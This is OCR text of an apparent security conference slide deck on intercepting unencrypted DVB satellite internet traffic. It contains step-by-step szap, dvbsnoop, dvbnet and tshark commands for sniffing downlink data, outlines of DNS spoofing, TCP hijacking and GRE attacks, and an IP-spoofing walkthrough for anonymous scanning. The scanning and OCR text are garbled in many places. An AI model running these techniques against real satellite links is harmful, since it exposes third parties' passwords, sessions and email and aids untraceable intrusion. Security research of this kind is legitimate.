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Playing in a Satellite 
environment 1.2 



Why i_2? 



i. because I'm sure that some people will 
publish more attacks. 

.2 because previously presentations about 
satellite. 



Who comented this before? 



■ Warezzman - (in 2004 at Undercon VIII first 

Spanish hackerCON) 

■ Jim Geovedi & Raditya Iryandi 
(HITBSecConf20o6) 

■ Adam Laurie (Blackhat 2009 at DC) 



■ Myself at S2iSec Blog (February 2009) 



Intro to SAT 



■ Orbit based satellites 

■ Low Earth orbiting (LEO) 

■ Geostationary orbit (GEO) 

■ Other: Molniya, High (HEO), etc. 

■ Function based satellites 

■ Communications 

■ Earth observation 

■ Other: Scientifics, ISS, etc. 



Intro to SAT 



22,300 mi 
(35,838 km) 



Intro to SAT 



■ Satellite LEO 

■ Meteorological 

■ HAM (Amateur Radio Operator) 

■ Satellite GEO 

■ UFO (UHF Follow ON) Military 

■ Inmarsat 

■ Meteorological (Meteosat) 

■ SCPC /Telephony link FDMA 



Digital Video 
Broadcasting 

The signal from the sky you 
waiting 



DVB 



■ Standard of European Telecommunications 
Standards Institute (ETSI). 

■ Defines audio and video transmission, and 
data connections. 

■ DVB-S & DVB-S2 is the specification for 
satellite communications. 



DVB-S 



■ Transponder: Like channels (in Satellite 
comms) 

■ Frecuency (C band or Ku). Ex: i2.og2Ghz 

■ Polarization, (horizontal/vertical) 

■ Symbol Rate. Ex: 27500Kbps 

■ FEC. 

■ Every satellite has many transponders 
onboard which are operating on different 
frequencies 



DVB-S 




Content 



] Multi plexing 



Video 



Audio 



Teletext 



EPG 



CoskI. Access 



IP Packets 



Private Data 



Applications 



App. Info 
(AITJ 



-4 



Transport Stream: 






1 Packet = 
1 88 Bytes 



Header with 


Adaption 


Payload 


PID 


Field 


PES / Section f Piped Data 


( 4 byte ) 


( n i>Y te } 


( 184-n Byte } 



DVB-S 



Header 



0x47 


Flags 


PID 


Flags 



Bodv 



Adaptation Field Data 



Program ID (PID): It permits different programs at same 
transponder with different components [Example BBCi 
PIDs: 600 (video), 601 (English audio), 603 (subtitles), 4167 
(teletext)] 

Special PIDs: NIT (Network Information Table), SDT (Service 
Description Table), PMT (Program MapTables), PAT (Program 
Association Table). 



DVB Feeds 



■ Temporal video links. 

■ Live emissions, sports, news. 

■ FTA- In open video. 



DVB Feeds 




Hispasat Pre news feed (live news) 



DVB Feeds 




DVB Feeds (2002) 




^ HE BBC NEWS | Programmes | . . . 

4* C ft ^ h1±p://news.bbc.co.uk/l/hi/programmes/newsnighty2041754.stm 




□□B NEWS 



You are in: Programmes: Newsnight 



News Front Page 
World 
UK 

England 
N Ireland 
Scotland 
Wales 
Politics 
Business 
Entertainment 
Science/Nature 
Technology 
Health 
Education 

Talking Point 

Country Profiles 
In Depth 



Newsnight 



Thursday, 13 June, 2002, 00:28 GMT 01:28 UK 

Enthusiast 
watches Nato spy 
pictures 




rogrammes 



0QH SPORT 



□ QH WEATHER 



neujs 



SERVICES 



Daily E-mail 
News Ticker 
Mobile/PDAs 

Text Only 
Feedback 
Help 



By Mark Urban 

Newsnight's Diplomatic Editor 

Nato surveillance flights in the 
Balkans are beaming their 
pictures over an insecure 
satellite link - and anyone can 
tune in and watch their 
operations live. 

The discovery was made last 
November by John Locker, a 
satellite enthusiast in north 
west England. 



EDITIONS 



Change to World |_|^ told 

Newsnight that 

hp <^npnr 



1 



WATCH/LISTEN real media 
ON THIS STORY 



iThe BBC's Nark Urban 

"A serious threat to Nato 
continues" 



Newsnight 



► Home 

► Newsnight Review 

► Latest programme 1 

► Recent highlights 

► About Newsnight 
r Contact us 




FORUM 



NATO security 
risk? 

See also: 

>■ 09 Mar 00 | Europe 

Nato spy leaked 
bombing secrets 

t 09 Mar 00 | Politics 

Nato spy 

revelations 

staggering 

k 23 Oct 01 | Americas 

Hacktivists take 
sides in war 

Internet links: 



SEARCH 




Go 



DVB Feeds (2002) 




Captured NATO feeds 



DVB Feeds (2002) 




NATO COMINT official 



DVB Feeds 



■ I widely known that the Department of 
Defense (DoD) and some US defense 
contractors use satellites and DVB for their 
comms. 



DVB Feeds 



■ Let's see: 



http://telecom.esa.int/telecoiTi/media/document/DVB- 

RCS%2oNetworks%2ofor%20the%2oUS%2oDefense%2oMarket%2o(R^).pdf 



DVB Feeds (2009) 



W (® Insurgents Hack U.S. Drum 




G 




■ 1 




[4- ->J CJ [it J [ft http: //online. wsj.com/artjcle/SBl 26 10 2 247BS9095011.html#printMode ~f 







DECEMBER 17. 2009 

Insurgents Hack U.S. Drones 

$^6 Software Is Used to Breach Key Weapons in Iraq; Iranian Backing Suspected 
By SIOBHAN GORMAN, YOCHI J. DREAZEN and AUGUST COLE 

WASHINGTON — Militants in Iraq have used $26 off-the-shelf software to intercept live video feeds from U.S. Predator drones, 
potentially providing thern with information they need to evade or monitor U.S. military operations. 

Senior defense and intelligence officials said Iranian-backed insurgents intercepted the video feeds by taking advantage of an 
unprotected communications link in some of the remotely flown planes' systems. Shiite fighters in Iraq used software programs such as 
Sky Grabber — available for as little as $25.95 on the Internet — to regularly capture drone video feeds, according to a person familiar 
with reports on the matter. 

U.S. officials say there is no evidence that militants were able to take control of the drones or otherwise interfere with their flights. Still, 
the intercepts could give America's enemies battlefield advantages by removing the element of surprise from certain missions and 
making it easier for insurgents to determine which roads and buildings are under U.S. surveillance. 

The drone intercepts mark the emergence of a shadow cyber war within the U.S.-led conflicts overseas. They also point to a potentially 
serious vulnerability in Washington's growing network of unmanned drones, which have become the American weapon of choice in both 
Afghanistan and Pakistan. 

The Obama administration has come to rely heavily on the unmanned drones because they allow the U.S. to safely monitor and stalk 
insurgent targets in areas where sending American troops would be either politically untenable or too risky. 

The stolen video feeds also indicate that U.S. adversaries continue to find simple ways of counteracting sophisticated American military 
technologies. 



DVB Feeds (2009) 




US COMINT official 



DVB Feeds 



■ Find feeds: 

■ Lists of channels in www 

■ Blind Scan 

■ Visual representations of the signal 



DVB Feeds - Too know more 



■ Dr HANS 

■ http://drhans.jinak.cz/news/index.php 

■ Zackyfiles 

■ http://www.zackyfiles.com (in Spanish) 

■ Satplaza 

■ http://www.satplaza.com 



DVB Data 



■ Two scenarios 

■ Satmodem 

■ Satellite Interactive Terminal (SIT) or Astromodem 



DVB Data - Satmodem 





DVB Data - Satmodem 



DOWNLINK 




DVB Data - Satmodem 



DOWNLINK 




DVB Data - Satmodem 



DOWNLINK 




DVB Data - Satmodem 




DVB Data - Astromodem 



DOWNLINK & UPLINK 




ISP DOWNLINK & UPLINK 



Satellite Coverage 



Typical combined downlink coverages for EUROBIRD' - 3 at 33 * Eas! 




Satellite Coverage 




DVB Data 



Anyone with coverage can SNIFF 
the DVB Data, and normally it is 
unencrypted. 



DVB Data 



■ What do you need: 

■ Skystar 2 DVB Card 

■ linuxtv-dvb-apps 

■ Wireshark 

■ The antenna 

■ Data to point it. 



DVB Data 



I bought it for 50c!!! from an 
PayTV ex-"hacker" :P 
(Including a set-top box that I will 
not use) 



DVB Data 



e^Y skystar 2 } Computers Netw. 



C fi http : //shop. ebay. coin /item s/_WOQQ_nk wZsky s tar Q 20 2QQ_ar m rsZ lQQ_fr o m ZR40QQ_rn doZ 



AUVtK I IbtMbN I l aDOUt J 



Personalize Gift 
and Greeting Cards 



Home > Buy > Search results for "skystar 2 




■p 



ft 



S3 



Use your own photos and 
we'll deliver to their door 



Buy Gift Cards 



TT 



Find skystar 2 



in All Categories 



Opt out of the new search experience 

Search | [ Advanced Search ] 



r Include tide and description 
Related Searches: skystar, skystar hd, skystar usb, dream box, skystar hd2 



Refine search 



i r 



^ r 



All items Auctions only Buy It Now only 



▼ Categories 

Computers & 
Networking (2) 

PC Components (2) 

In Computer Video 
a TV Cards 

v Price 



2 results found foi skystar 2 [ Save this search ] 



$ to $ 

* Brand 

* Installed Memory 



View as (.. ( ▼ [ Customize view ] 


Sort by Best Match 








Time 




Price 


Left 




THE^ Sky Star 2 TV PCI * 


$41.00 


6d 1 h 4m 




p; ;Jf| Revision 2.6D for Satellite 








Internet 








SkyStar 2 TV PCI 
Revision 2.6D for 
Satellite Internet 



* 2 Bids $24.00 



2d Oh 45m 



2 items found in eBay Stores fl® 



DVB Data 



4f( parabolica^ Audio, TV y Re... 



| <- G 1 1 /ft J | ^ http : //shop . ebay . es/?_fr o m =R40&fts = 2&_tr ksid =p 390 7 . m 38 . 1 1 3 1 3&_nk w =parabolica&_sacat=See- All-Categories 




C ■_■ ■_■ U 1 1 1 L- U ■_■ I CO L.-L-JJ 

Television Digital Terrestre (6) 
Televisores (2) 
Radioaficionado (i) 

Informatics y PDAs (4) 

Redes (4) 

Musica, CD y Vinilos (4) 
Ver todas las categorias 




▼ Estado 

O Nuevo 

□ Usado 

□ Sin especificar 
Elegir mas... 

▼ Vendedor 
Especifica vendedores. 




Precio 30002 



Feeder Abaks 2.4Ghz para antena 
parabolica 24-27dbi 

Ubicacion: Espana 



Pujas 23,00 EUR +^oo eur 



Annpliar 



+ 



KIT ANTENA PARABOLICA 60CM + LNB 
0,1 dB 

Ubicacion: Espana 



?jCtimprtjb)®f 19,99 EUR +?,oo eur 




ANTENA PARABOLICA SATYCON 60CM 
(KIT COMPLETO) 

Ubicacion: Espana 



?j€&Mprtjb j&/ 20,03 EUR +5 00 eur 




ANTENA PARABOLICA SATYCON 80CM 
(KIT COMPLETO) 

Ubicacion: Espana 



ZjC&npraki ya? 29,16 EUR +?,oo eur 



i 



. ■ ■ i 



r 



LOCALIZADOR DE SATE LITE PARA 
ANTENA PARABOLICA 

Muy practice y econonnico para localizar 
sate I its s 

Ubicacion: Espana 



iNO ENCUENTRAS LO OUE ESTAS BUSCANDO? 



restante 



2d Oh 9m 



30dGh 10m 



6d2h56m 



6d2hS6m 



?fC&qpr*fo j&f 12,00 EUR +s,oo eur gOd 23h 19m 




DVB Data 



Linux has the modules for this card by 
default, we only need the tools to manage it: 

linuxtv-dvb-apps 

My version is 1.1.1 and I use Fedora (Not too 
cool to use Debian :P). 



Sniffing Data 



Once the antenna and the card is installed 
and linuxtv-dvb-apps compiled and installed, 
the process is: 

1- Tune the DVB Card 

2- Find a PID with data 

3- Create an Ethernet interface associated to that 
PID 

We can repeat 2 to 3 any times we want. 



Sniffing Data 



1- Tune the DVB Card 

2- Find a PID with data 

3- Create an Ethernet interface associated to that 
PID 



Sniffing Data 



Tune DVB Card 

The tool we must use is szap and we need the 
transponder's parameters in a configuration 
file. 



For example, for "Sirius-4 Nordic Beam": 

# echo "sirius4N:i2322:v:o:27500:o:o:o" » channels, conf 



Sniffing Data 



We run szap with the channel configuration 
file and the transponder we want use (the 
configuration file can have more than one). 

# szap -c channels, conf sirius^N 

We must keep it running. 



Sniffing Data 



\P rootirtsathunter:^ 



[root@sathunter ~] # szap -c channels . conf datal 
reading channels from file ' channels . conf 1 
zapping to 1 'datal' : 

sat 0, frequency = 12591 MHz V, syinbolrate 30000000, vpid = 0x0000, 
□ 

us ing ' / dev/ dvb/ adap terO/ front endO ' and ' / dev/ dvb/ adap t er 0/ demuxO 1 



apid = OxOOO 



using 1 / a 
status 03 
status If 
status If 
status If 
status If 
status If 
status If 
status If 



signal 6aea 

signal bl46 

signal blbS 

signal b072 

signal to lad 

signal bl2b 

signal blSl 

signal bl64 



r ont endO ' and ' / dev/ dvb/ adap t er 0/ demuxO 1 
snr 6c99 | ber 00008856 | unc 00000000 | 



snr d7ca ber 00000af3 



snr d803 
snr d74 6 



ber 00000000 
ber 00000000 



unc 00000000 | 
unc 00000000 | 
unc 00000000 I 



FE HAS LOCK 



FE 
FE 



HAS 
HAS 



LOCK 
LOCK 



snr d782 | ber 00000000 | unc 00000000 | FE_HAS_LOCK 

snr d7c7 | ber 00000000 | unc 00000000 | FE_HAS_LOCK 

snr d776 | ber 00000000 | unc 00000000 | FE_HAS_LOCK 

snr d7bb | ber 00000000 | unc 00000000 | FE HAS LOCK 



FE HAS LOCK 



FE HAS LOCK 



Sniffing Data 



The transponder parameters can be found 
around Internet. 

http://www.fastsatfinder.com/transponders.html 



Sniffing Data 



1- Tune the DVB Card 

2- Find a PID with data 

3- Create an Ethernet interface associated to that 
PID 



Sniffing Data 



■ FindaPID 

#dvbsnoop -s pidscan 

Search for data section on results. 



Sniffing Data 



root@sathunter:~ 


1 [root@sathunter 


~] # dvbsnoop -s pidscan 








Idvbsnoop VI 


.4.50 


— http 


: / /dvbsnoop 


. sourcef orge . net/ 








Transponder 


PID- 


Scan. . . 












PID found: 





(0x0000) 


[SECTION: 


Program Association Table 


(PAT) ] 




PID found: 


16 


(0x0010) 


[SECTION: 


Network Information Table 


(NIT) 


— 


actual network] 


PID found: 


17 


(0x0011) 


[SECTION: 


Service Description Table 


(SDT) 


— 


actual transport stream] 


PID found: 


20 


(0x0014) 


[SECTION: 


Time Date Table (TDT) ] 








PID found: 


1000 


(0x03e8) 


[SECTION: 


Program Hap Table (PUT) ] 








PID found: 


1001 


(0x03e9) 


[SECTION: 


Program Hap Table (PHT)] 








PID found: 


1010 


(0x03f2) 


[SECTION: 


User private] 








PID found: 


1011 


(0x03f3) 


[SECTION: 


User private] 








PID found: 


1012 


(0x03f4) 


[SECTION: 


User private] 








PID found: 


1013 


(0x03f5) 


[SECTION: 


User private] 








PID found: 


1014 


(0x03f 6) 


[SECTION: 


Network Information Table 


(NIT) 


— 


other network] 


PID found: 


1020 


(0x03f c) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 


PID found: 


1021 


(0x03fd) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 


PID found: 


1022 


(0x03fe) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 


PID found: 


1023 


(0x03ff ) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 


PID found: 


1025 


(0x0401) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 


PID found: 


102 6 


(0x0402) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 



Sniffing Data 



1- Tune the DVB Card 

2- Find a PID with data 

3- Create an Ethernet interface associated to 
that PID 



Sniffing Data 



■ Create an interface associated to a PID 
#dvbnet -a <adapter number> -p <PID> 

■ Activate it 

#ifconfig dvbO_<iface number> up 



Sniffing Data 



i/ 1 root@sathunter:~ 

[uoou@sar.nunr.er # dVdnec -a -p 10ZZ 
DVB Network Interface Manager 

Version 1.1.0-TVF (Build vie mar 06 12:54:43 2009) 
Copyright (C) 2003, TV Files S.p.A 

Device : /dev/dvb/ adapter 0/netO 

Status: device dvbO_0 for pid 1022 created successfully. 
[root@sathunter ~] U ifconfig dvbO_0 up 
[root@sathunter # ifconfig dvbO_0 

dvbO_0 Link encap : Ethernet HWaddr 00 : DO : D7 : OC : 67 : 8D 

inet6 addr: f eSO : : 2d0 : d7f f : f eOc : 673d/ 64 Scope: Link 

UP BROADCAST RUNNING NOARP MULTICAST MTU: 409 6 Metric :1 

RX packets :□ errors :□ dropped: □ overruns :□ frame :□ 

TX packets :□ errors :□ dropped: overruns :□ carrier :□ 

collisions :□ t x queue 1 en: 1000 

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) 

Base address : 0x3f e 



[root@sathunter ~] # 



Sniffing Data 



Back to de pidscan results 



[jf* root@sathunter:~ 


1 [root@sathunter 


--] # dvbsnoop -s pidscan 








Idvbsnoop VI 


. 4 . 50 


— http: 


//dvbsnoop 


. sourcef orge . net/ 








1 Transponder 


PID- 


Scan. . . 












PID 


found: 


□ 


(0x0000) 


[SECTION: 


Program Association Table 


(PAT) ] 




PID 


found : 


16 


(0x0010) 


[SECTION: 


Network Information Table 


(NIT) 


— 


actual network] 


PID 


found : 


17 


(0x0011) 


[SECTION: 


Service Description Table 


(SDT) 


— 


actual transport stream] 


PID 


found : 


20 


(0x0014) 


[SECTION: 


Time Date Table ( TDT) ] 








PID 


found : 


1000 


(0x03e8) 


[SECTION: 


Program Hap Table (PHT)] 








PID 


found : 


1001 


(0x03e9) 


[SECTION: 


Program Hap Table (PHT)] 








PID 


found: 


1010 


(0x03f 2 ) 


[SECTION: 


User private] 








PID 


found: 


1011 


(0x03f 3 ) 


[SECTION: 


User private] 








PID 


found: 


1012 


(0x03f 4) 


[SECTION: 


User private] 








PID 


found: 


1013 


(0x03f 5) 


[SECTION: 


User private] 








PID 


found: 


1014 


(0x03f 6) 


[SECTION: 


Network Information Table 


(NIT) 


— 


other network] 


PID 


found: 


1020 


(0x03f c) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 


PID 


found: 


1021 


(0x03f d) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 


PID 


found: 


1022 


(0x03f e) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 


PID 


found: 


1023 


(0x03f f ) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 


PID 


found: 


1025 


(0x0401) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 


PID 


found: 


1026 


(0x0402 ) 


[SECTION: 


DSH-CC - private data section 


// 


DVB datagram] 



Sniffing Data 



Create another interface 



\& root@sathunter:~ 


[root@sathunter ~] # dvbnet -a □ 


-p 1021 


DVB Network Interface Manager 




Version 1.1.0-TVF (Build vie mar 


06 12:54:43 2009) 


Copyright (C) 2003, TV Files S.p 


. A 



Device : /dev/dvb/adapterO/netO 

Status: device dvb0_l for pid 1021 created successfully. 
[rootGsathunter ~] # ifconfig dvb0_l up 
[rootGsathunter ~] # ifconfig dvb0_l 

dvb0_l Link encap : Ethernet HWaddr 00 : DO : D7 : 0C : 67 : 8D 

inet6 addr: f eSO : : 2d0 : d7f f : f eOc : 678d/ 64 Scope: Link 

UP BROADCAST RUNNING NOARP MULTICAST HTU:409 6 Metric: 1 

RX packets :□ errors :□ dropped: overruns :□ frame :□ 

TX packets :□ errors :□ dropped: overruns :□ carrier :□ 

collisions :□ txqueuelen: 1000 

TiY hyr.p^:n (n.n b) ty hyr.p^:n (n.n b) 

Base address : 0x3f d 



Sniffing Data 



Wireshark is our friend 



^ root@sathunter:~ 




_|n| > 




[rootSsathunter: ~] # tshark -ni dvtoO 1 -w /dev/null 




E 


J 


Capturing on dvtoO 1 




1 




16353 




1 




[rootSsathuntei: --] # | 








l 




I 





16358 packets in 10 seconds 



Sniffing data 



Display filter: none 



Protocol 


% Packets 


Packets 


Bytes 


Mbit/s 


End Packets 


End Bytes 


End Mbit/s 


B Frame 


100,00% 


17122 


11983350 


7,650 








0,000 


B Ethernet 


100,00% 


17122 


11988350 


7,650 








0,000 


B Internet Protocol 


100,00% 


17122 


11988350 


7,650 








0,000 


B Generic Routing Encapsulation 


13,41% 


2296 


1100945 


0,703 


7 


294 


0,000 


B User Datagram Protocol 


7,67% 


1313 


489998 


0,313 








0,000 


B Domain Name Service 


0,71% 


121 


23855 


0,015 


120 


23750 


0,015 


Data 


3,84% 


658 


286093 


0,183 


658 


286093 


0,183 


B UDP Encapsulation of IPsec Packets 


2,98% 


510 


177409 


0,113 


1 


43 


0,000 


eDonkey Protocol 


0,02% 


4 


305 


0,000 


4 


305 


0,000 


Simple Network Management Protocol 


0,04% 


7 


700 


0,000 


7 


700 


0,000 


Internet Security Association and Key Management Protocol 


0,05% 


9 


1271 


0,001 


9 


1271 


0,001 


Hypertext Transfer Protocol 


0,01% 


1 


95 


0,000 


1 


95 


0,000 


Network Time Protocol 


0,02% 


3 


270 


0,000 


3 


270 


0,000 


B Transmission Control Protocol 


64,99% 


11128 


8923504 


5,694 


4796 


1517444 


0,968 


B Hypertext Transfer Protocol 


25,23% 


4320 


6194417 


3,953 


4165 


6093498 


3,888 


Data 


7,31% 


1251 


970027 


0,619 


1251 


970027 


0,619 


Simple Mail Transfer Protocol 


1,27% 


218 


28045 


0,018 


218 


28045 


0,018 


MSN Messenger Service 


0,19% 


32 


6636 


0,004 


32 


6636 


0,004 


n Secure Socket Layer 


1,43% 


244 


132109 


0,084 


243 


131519 


0,084 


TPKT-ISO on TCP - RFC 1006 


0,22% 


37 


2451 


0,002 


37 


2451 


0,002 


SSH Protocol 


0,22% 


38 


6256 


0,004 


38 


6256 


0,004 


B Financial Information exchange Protocol 


0,05% 


8 


1157 


0,001 


6 


558 


0,000 


Post Office Protocol 


0,66% 


113 


59548 


0,038 


113 


59548 


0,038 


Modbus/TCP 


0,18% 


30 


1980 


0,001 


30 


1980 


0,001 


B Virtual Network Computing 


0,15% 


26 


1616 


0,001 








0,000 


MySQL Protocol 


0,01% 


2 


224 


0,000 


2 


224 


0,000 


Firebird SQL Database Remote Protocol 


0,07% 


12 


1520 


0,001 


12 


1520 


0,001 


Point-to-Point Tunnelling Protocol 


0,01% 


1 


74 


0,000 


1 


74 


0,000 


Data 


0,19% 


33 


1914 


0,001 


33 


1914 


0,001 


Encapsulating Security Payload 


13,33% 


2283 


1466738 


0,936 


2283 


1466738 


0,936 


Internet Control Message Protocol 


0,40% 


69 


5251 


0,003 


69 


5251 


0,003 



Sniffing Data 



■ We can have more than one PID assigned to an 
interface, this will be very useful. 

■ Malicious users can: 

■ Catch passwords. 

■ Catch cookies and get into authenticated HTTP 
sessions. 

■ Read emails 

■ Catch sensitive files 

■ Do traffic analysis 

■ Etc .... 



Sniffing Data 



Reminder: 

In satellite communications we have two 
scenarios: 

A- Satmodem, Only Downlink via Satellite 
B- Astromodem, Both uplink and downlink via 

Satellite. 



Sniffing Data 



We can only sniff the downloaded data. We 
can only sniff one direction in a connection. 



Some "old" Stuff in Sat hacking 



■ DNS Spoofing 

■ TCP hijacking 
■Attacking GRE 



DNS Spoofing 



DNS Spoofing is the art of making a DNS 
entry to point to an another IP than it would 
be supposed to point to. (SecureSphere) 



DNS Spoofing 



■ Data we need to perform this attack 

■DNS Request ID 
■ Source Port 
■Source IP 
■Destination IP 
■Name/IP asking for 



DNS Spoofing 



■ It's trivial to see that if we sniff a DNS 
request we have all that information and we 
can spoof the answer. 

■ Many tools around do this job, the only 
thing we also need is to be faster than the 
real DNS server (jizz). 



DNS Spoofing 



■ Why is this attack important? 

■Think in phising 

■ With this attack, uplink sniff can be possible 

■ Rogue WPAD service 

■ Sslstrip can be use to avoid SSL connections. 



Some "old" Stuff in Sat hacking 



■ DNS Spoofing 

■ TCP hijacking 
■Attacking GRE 



TCP hijacking 



TCP session hijacking is when a hacker takes 
over a TCP session between two machines. 
(ISS) 



TCP hijacking 




Seq=Si ACK=Ai Datalen=Li 



4 



Seq=Ai ACK=Si+Li Datalen=l_2 





Seq=Si+Li ACK=Ai+L2 Datalen=L3 




If we sniff 1 we can predict Seq and Ack of 2 and 
we can send the payload we want in 2 



TCP Hijacking 




TCP Hijacking 



■ Initially we can only have a false connection with A. 

■ In certain circumstances, we can make this attack 
with B, when l_2 is predictable. 

■Some tools for doing this: 

■Hunt 

■Shijack 
■Scapy 



Some "old" Stuff in Sat hacking 



■ DNS Spoofing 

■ TCP hijacking 
■Attacking GRE 



Attacking GRE 



■ Generic Routing Encapsulation 

■ Point to point tunneling protocol 

■13% of Satellite's data traffic in our 
transponder is GRE 



Attacking GRE 



This chapter is based in Phenoelit's discussion 
paper written by FX applied to satellite 
scenario. 

Original paper: 

http://www.phenoelit-us.org/irpas/qre.html 



Attacking GRE 




Attacking GRE 



Find a target: 

#tshark -ni dvbo_o -R gre -w capture. cap 



Attacking GRE 



GRE Packet 



IPdesti 



IP source 1 



GRE header 



Payload IP dest 



Payload IP source 



Payload IP Header 



Payload Data 



Attacking GRE 



■ IP dest 1 and source 1 must be Internet 
reachable IPs 

■The payload's IPs used to be internal. 



Attacking GRE 




10.0.0.54 






7 



10.0.0.54 



10.0.0.5 



V 



Attacking GRE 



(*)GRE Packet 



1.1.1.1 



1.1.1.2 



GRE header (32 bits without flags) 



10.0.0.5 



10.0.0.54 



Payload IP Header 



Payload Data 



Attacking GRE 




Attacking GRE 



(1) GRE Packet 



1.1.1.1 



1.1.1.2 



GRE header (32 bits without flags) 



10.0.0.5 



10.0.0.54 



Payload IP Header 



Payload Data 



Attacking GRE 




Attacking GRE 



(2) IP Packet 



10.0.0.5 



10.0.0 



IP header 



Data 



54 



Attacking GRE 



1.1 




Attacking GRE 



(3) IP Packet 



10.0.0.54 10.0.0.5 



IP header 2 



Data 2 




ico.0.54 




Attacking GRE 



(4) GRE Packet 



1.1.1.2 



1.1.1.1 



GRE header (32 bits without flags) 



10.0.0.54 



10.0.0.5 



Payload IP Header 2 



Payload Data 2 



Attacking GRE 



At Phenoelit's attack payload's IP source is our public IP. This 
attack lacks when that IP isn't reachable from the internal 
LAN and you can be logged. 

I use internal IP because we can sniff the responses. 
To better improve the attack, find a internal IP not used. 



HTSNACBT Attack 



How 

To 

Scan 

NSA 

And 

Cannot 

Be 

Traced 



HTSNACBT Attack 



We can send a 5YN packet with any 
destination IP and TCP port (spoofing a 
satellite's routable source IP) , and we can 
sniff the responses. 

We can analyze the responses. 



HTSNACBT Attack 



OR... We can configure our linux like a 
satellite connected host. 



VERY EASY!!! 



HTSNACBT Attack 



■ What we need: 

■ An internet connection (Let's use it as uplink) with 
any technology which let you spoofing. 

■ A receiver, a card.... 



HTSNACBT Attack 



■ Let's rock! 

■ Find a satellite IP not used, I ping IPs next to 
another sniffable satellite IP to find a non 
responding IP. We must sniff our ping with the 
DVB Card (you must save the packets). 



■ This will be our IP! 



HTSNACBT Attack 



Configure Linux to use it 



root@sathunter:> 



address 

: 13 : 02 : 49 : 23 : 73 




Flags Mask 

C 



□ : 05 : 



I: 01 



eth2 
eth2 
eth2 



We need our router x s MAC 



HTSNACBT Attack 



Configure our dvb interface to receive this IP 
(I suppose that you have configure the PID...) 

The IP is the one we have selected and in the 
ICMP scan, we must get the destination MAC 
sniffed. 



HTSNACBT Attack 



$ rootiS'sathunter: 



[rootBsathunter ~] # tshark: -Vnr sat_captured . cap | less 
Frame 1 (54 bytes on wire, 54 bytes captured) 

Arrival Time: Mar 25, 2009 01 : 58 : 47 . 220140000 

[Time delta from previous captured frame: seconds] 
[Time delta from previous displayed frame: . 00000000CLJe^a#^ 
[Time since reference or first frame: seconasy 
Frame Number: 1 

Frame Length: 54 bytes £1001* 1 

Capture Length: 54 bytes 

[Frame is marked: False] OU 
[Protocols in frame: eth:ip:tcp] 
Ethernet II, Sr c : □□:□□:□□:□□:□□:□□ (□□:□□:□□:□□:□□:□ □), Dst: QQ:t 
Des t inat ior. : 6^^^^^B< : S^^B^^Mtn , 



3tSgrt ] we get the MAC 
address we must configure 
in our DVB interface 



(00: 6 



Dest inat io: 



Address: 00:61 



(00: 



Vs—g-g-g-g— g-g-g-g— g-g-g-g— !■!■!■!— 4tHww^w U i u i dua 1 addr ess ( un i c as t ) 

= LG bit: Globally unique address (factory default) 

Source : 00 : 00 : 00 : 00 : 00 : 00 ( 00 : 00 : 00 : 00 : 00 : 00 ) 

Address : 00 : 00 : 00 : 00 : 00 : 00 (00 : 00 : 00 : 00 : 00 : 00) 

= IG bit: Individual address (unicast) 

= LG bit: Globally unique address (factory default) 

Type: IP (0x0300) 

Internet Protocol, iB^^^^H^^M^ ( E^^^B^^^^B ) , Dst: ^^M^tfH^3 (^H^P^^H73) 

Version: 4 

Header length: 20 bytes 

Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 

0000 00.. = Differentiated Services Codepoint: Default (0x00) 

0. = ECN-Capable Transport (ECT) : 

= ECN-CE: 

Total Length: 40 
Identification: 0x9cb4 (40116) 
Flags: 0x00 

0... = Reserved bit: Not set 



HTSNACBT Attack 



i^ 3 root@sathunter:~ 








[root@ sat hunter 


--] » ifconfig dvtaO ^^^H 


net mask 2 55 . 2 55 . 2 55 . 2 55 hw ether 00 : b^^^H 




[root@ sat hunter 









I use netmask 732 to avoid routing problems 



HTSNACBT Attack 



Now we can configure our Internet interface 
with the same IP and configure a default 
route with a false router setting this one with 
a static MAC (our real router's MAC). 



HTSNACBT Attack 



r ootiSsat hunter:^ 



[root@ sathunter 
[root@ sathunter 
[rootS sathunter 
[rootS sathunter 



] n ifconfig eth2 ^^^H^^H 

] s route add default gw 

] « arp -s ^^^^^^^74 00 

]# i 



05: 



netniask 255.255.255.252 
^^B?4 dev eth2 



HTSNACBT Attack 



ITWORKS! 



root(rt'sathunter:~ 



[rootBsathunter --] # ping uuu.nsa.gov 
PINGuuu.nsa.gov (12.110.110.204) 56(84) 




bytes of data 



uuu.nsa.gov ping statistics 

4 packets transmitted, received, 100% packet loss, time 2999ms 
[rootBsathunter --] # ping uuu.google.es 

PING uuu. 1 . google . com (209.35.229.99) 56(34) bytes of data. 

64 bytes from uu-in-f99.google.com (209.35.229.99): icmp_seq=l ttl=237 time=69.0 ms 
64 bytes from uu-in-f99.google.com (209.35.229.99): icmp seq=2 ttl=237 time=59.6 ms 



uuu. 1 . google . com ping statistics 



2 packets transmitted, 
rtt min/avg/max/mdev = 
[ r o o t @ s at hunt e r ■-] » | 



2 received, 0% packet loss, t 
59.635/64.360/69.036/4.632 ms 



time 1000ms 



HTSNACBT Attack 



This is all !!! 

Some things you must remember: 

The DNS server must allow request from any 
IP or you must use the satellite ISP DNS 
server. 



HTSNACBT Attack 



If you have any firewall (iptables) disable it. 

All the things you make can be sniffed by 
others users. 



HTSNACBT Attack 



Now attacking GRE is very easy, you only 
need to configure your Linux with IP of one of 
the routers (the one with the satellite 
connection) and configure the tunneling. 

http://www.qoogle.es/search?rlz=iCiGPEA en ES^i2&sourceid=chro 
me&ie=UTF-8&q=confiqurinq+GRE+linux 



What TO DO now? 



■ I'm studying the different methods to trace 

illegal users. (I only have a few ideas). 

■ In the future I would like to study the 
possibilities of sending data to a satellite via 
Astromodem (DVB-RCS). 



Conclusions 



■ Satellite communications are insecure. 

■ It can be sniffed. 

■ A lot of attacks can be made, I just talked 
about only few level 4 and level 3 attacks. 



Conclusions 



■ With this technology in our sky, an 
anonymous connection is possible. 

